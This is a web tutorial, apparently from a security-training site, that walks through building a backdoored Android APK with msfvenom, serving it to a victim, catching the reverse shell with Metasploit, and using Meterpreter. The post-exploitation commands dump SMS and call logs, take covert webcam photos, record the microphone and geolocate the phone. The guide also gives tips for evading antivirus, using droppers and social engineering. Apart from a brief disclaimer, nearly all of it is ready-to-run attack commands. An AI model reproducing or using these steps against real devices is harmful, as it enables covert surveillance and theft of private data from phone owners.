Unlock cybersecurity expertise, protect digital frontiers, secure your future today! Join Now
Home
Android Hacking

Hacking Android Devices Using msfvenom and Metasploit – Complete Guide

Learn how to generate Android reverse shell payloads with msfvenom and use Meterpreter for remote access and post-exploitation.

This article is for educational and authorized penetration testing purposes only. Unauthorized access to systems or devices is illegal and unethical. Always ensure you have explicit permission before testing.

Introduction

Android, being the most widely used mobile OS, is a frequent target for penetration testing. This guide demonstrates how to craft and deliver a Meterpreter reverse shell payload for Android devices using msfvenom and Metasploit, with step-by-step instructions from payload creation to post-exploitation.

What is msfvenom?

msfvenom is a versatile tool for generating and encoding payloads in the Metasploit Framework. It allows users to create custom malicious APKs that, once installed on a victim’s Android device, can establish a Meterpreter session to remotely control the system.

Step-by-Step: Exploiting an Android Device

Step 1: Generate the Payload

We’ll create a malicious APK that opens a reverse Meterpreter session when executed.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -o /root/Desktop/backdoor.apk

Explanation:

  • -p: Payload type.
  • android/meterpreter/reverse_tcp: Android-specific reverse shell.
  • LHOST: Attacker's IP address.
  • LPORT: Listening port.
  • -o: Output path and filename.

Step 2: Optional – Add Encoding for Evasion

Encoders can help evade antivirus or mobile security software.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 \
-e x86/shikata_ga_nai -i 3 -o /root/Desktop/encoded_backdoor.apk

Note: Encoders are limited for Android payloads; some may cause the APK to break. Always test in a lab environment.

To list encoders:

msfvenom --list encoders

Step 3: Serve the APK

To distribute the payload (in a controlled test environment), host it using Apache or Python:

cp /root/Desktop/backdoor.apk /var/www/html/
service apache2 start

Or use Python’s HTTP server:

cd /root/Desktop/
python3 -m http.server 8080

The victim must manually install the APK, which usually requires enabling “Install from unknown sources.”

Step 4: Set Up the Listener with Metasploit

Now configure Metasploit to handle the incoming reverse shell.

msfconsole

Then:

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set LPORT 4444
exploit

Metasploit will wait for a connection. Once the APK is installed and launched on the victim's device, you'll get a Meterpreter session.

Step 5: Interact with the Android Device

When the connection is established, Metasploit will output:

[*] Sending stage (723456 bytes) to 192.168.0.112
[*] Meterpreter session 1 opened

To interact:

sessions
sessions -i 1

Meterpreter Post-Exploitation Commands for Android

Now you have control of the device. Here are some useful Meterpreter commands for Android:

System Info

sysinfo

Displays Android version, model, etc.

Check Current User

getuid

Returns the user context of the app.

Dump Call Logs

dump_calllog

Extracts call history.

Dump SMS

dump_sms

Retrieves text messages from the device.

Webcam Snapshot

webcam_snap

Takes a picture using the front camera.

Record Audio

record_mic

Records audio from the microphone.

Geolocation

geolocate

Gets GPS location (if enabled on the device).

File System Control

cd /sdcard/
ls
download somefile.txt
upload /root/test.txt /sdcard/

Navigate, upload, or download files.

App List

app_list

Lists installed apps.

Shell Access

shell

Gives a native Android shell.

Step 6: Exit or Kill Session

Exit the session:

exit

Or kill it:

sessions -k 1

Optional: Payload Formats and Advanced Options

You can also use other formats:

  • Java JAR: -f jar
  • Python: -f raw
  • PowerShell: for Windows delivery
  • WAR: Web application archive

View All Android Payloads

msfvenom --list payloads | grep android

Important Tips

  • Modern Android devices have built-in security that may block or warn against such APKs.
  • Use obfuscation, third-party packers, or droppers to improve success rate.
  • Physical access or strong social engineering is often required.
  • APKs generated with msfvenom do not look or behave like legitimate apps.

Conclusion

This guide walks through the full process of generating and delivering an Android reverse shell payload using msfvenom and Metasploit. From basic payload creation to advanced Meterpreter interaction, the knowledge gained here is fundamental for Android penetration testing in lab environments.

Used responsibly, these skills can help security professionals identify weaknesses in mobile app ecosystems and build more secure applications.